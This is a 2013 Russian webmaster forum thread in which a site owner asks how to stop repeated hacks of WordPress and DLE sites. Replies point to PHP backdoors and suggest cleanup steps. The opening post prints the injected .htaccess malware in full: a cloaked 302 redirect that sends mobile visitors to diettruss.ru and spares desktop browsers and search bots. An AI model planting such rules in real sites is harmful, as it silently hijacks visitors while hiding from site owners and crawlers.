Постоянно ломают сайты на ВордПрессе и ДЛЕ. Дописывают редиректы для мобил в htaccess. Кто сталкивался, как бороться? Заколебался уже чистить каждый день.PHP код:RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://diettruss.ru/ [L,R=302]
- 11.05.2013 01:43
- -1
- 11.05.2013 02:00
такое в начале 2012 года было массово. Ломали всех подряд. Хостер прикрыл со временем дыру.
У вас файлы php скорее всего содержат код левый. Выкачайте на hdd и проверьте все.- 0
11.05.2013 02:01stickman, У вас не взламывают конкретно htaccess. А у вас есть вредоновсный код, вероятно в индексных файлах движка, шаблонов и плагинов. Он заново и заново вписывают эту хрень. Для того что бы определить то это или нет. Просто удалите всю гадость с htaccess потом перейдите на сайт с поиска один раз, должно перейти без перенаправлений. А вот повторный, уже с ридеректом на вредоносный сайт. Дальше вам нужно будет заказать(обычно это делают бесплатно) у хостера проверку сайта на вирусы, найти список уязвимых для заражения файлов, найти зараженные файлы самому. Код должен выглядеть "decodebase64 и куча непонятных символов", в любом случае что-то похожее, обычно прямо вначале кода, не похож на шелы, которые вписывают более хитро, когда человек которые знает Php на базовом уровне понять не может.
- 3
- 11.05.2013 02:36
Ой. Как меня за долбало чистить и искать шеллы.
- 0
- 11.05.2013 02:44Дипломник
- Регистрация: 09.12.2012
- Сообщений: 219
- Репутация: 84
akrustam, так ищите дыру, через которую шеллы попадают к Вам на сайт.
- 0
- 11.05.2013 03:05Легко сказать- сложно сделать. Зачастую это не зависит от самого сайта, и к тому же сложно обвинять в этом хостера. Рациональнее закрыть от редактирования файлы, как уже отписывалось на это форуме.
Сообщение от Ailton 
- 0
- 11.05.2013 03:36Дипломник
- Регистрация: 09.12.2012
- Сообщений: 219
- Репутация: 84
hammer8, закрыть файлы, конечно, можно (Вы имеете в виду способ с файлом ftpaccess?), но это далеко не панацея. Проверял на собственном опыте - ломают точно так же (двиг - ДЛЕ).
Тут, скорее, нужно смотреть в код установленных модов - возможно в них и есть уязвимость. Также не помешает заглянуть в логи и попытаться выяснить, как именно происходит заражение.- 0
- 11.05.2013 04:34Опытный
- Регистрация: 02.05.2012
- Сообщений: 332
- Репутация: 64
Уязвимость в последних нескольких версиях вордпресов, нашел на хакерском сайте пошаговый мануал по взлому сайта и получению админки или вноса кода в файлы без получения админки. Все очень просто, дыра реально не поправимая. В коментах набивается определенный код, если стоит капча, ее можно даже не распознавать и не вводить.
Хакеры смеются, что разработчик закрывая маленькую щель, открыл в другом месте большой тоннель.
Мне раз в неделю на одном сайте закидывают либо шел, либо юзера-клиента, а потом меняют ему права на админа, либо засаживают мне на сайт сенд-мейл.
Но то, что пишет ТС, это уже после, когда на сайте или на соседнем сайте на хостинге сидит шел.- 0
- 11.05.2013 04:49
Действительно хрень какаято. Сейчас посмотрел, еще на одном домене где вообще не стоит движок - тоже залит htaccess с редиректами. Беда...
---------- Сообщение добавлено 03:40 ---------- Предыдущее 03:39 ----------
не было раньше таких проблем (кажется), пока к webhost1 не переехал =/
---------- Сообщение добавлено 03:49 ---------- Предыдущее 03:40 ----------
Взгляните плиз, что тут может быть не так?Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.- 0
- 11.05.2013 04:49
stickman, с этой бедой боролся новой переинсталляцией движков на другом чистом хостинге и дизайн переносил вручную. То есть, снова все верстал по-новому, используя со старого диза только картинки, код писал заново. Это кара для тех, кто не делает вовремя бекапы.
- 1
Спасибо сказали:
altezzik(11.05.2013),
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
[help] .htaccess | DLE | 4 | 23.03.2013 13:34 |
.htaccess DLE | DLE | 1 | 21.02.2013 17:58 |
.htaccess | Хостинг и Серверы | 11 | 13.02.2013 19:23 |
htaccess.ru – правильная настройка файла .htaccess | Оценка ваших сайтов, блогов | 4 | 23.01.2013 11:07 |
Внимание взламывают сайты | Оффтоп и свободные темы | 20 | 20.06.2010 17:32 |
addurl adsense facebook google html proxy vkontakte xrumer zennoposter аккаунт база блог быть видео витрина вконтакт вопрос гугл день деть домен есть запрос кейс контент купить месяц можно новый нужный парсер партнёрская программа плагин пользователь порно проблема программа продажа продвижение работа работать регистрация сайт сделать сервис сеть скрипт софт ссылка стать статья стоимость страница тариф текст тема трафик форум цена яндекс
Тем:
77,544Сообщений:
762,307Пользователей:
30,079Сейчас на сайте:
1 пользователей и 224 гостей
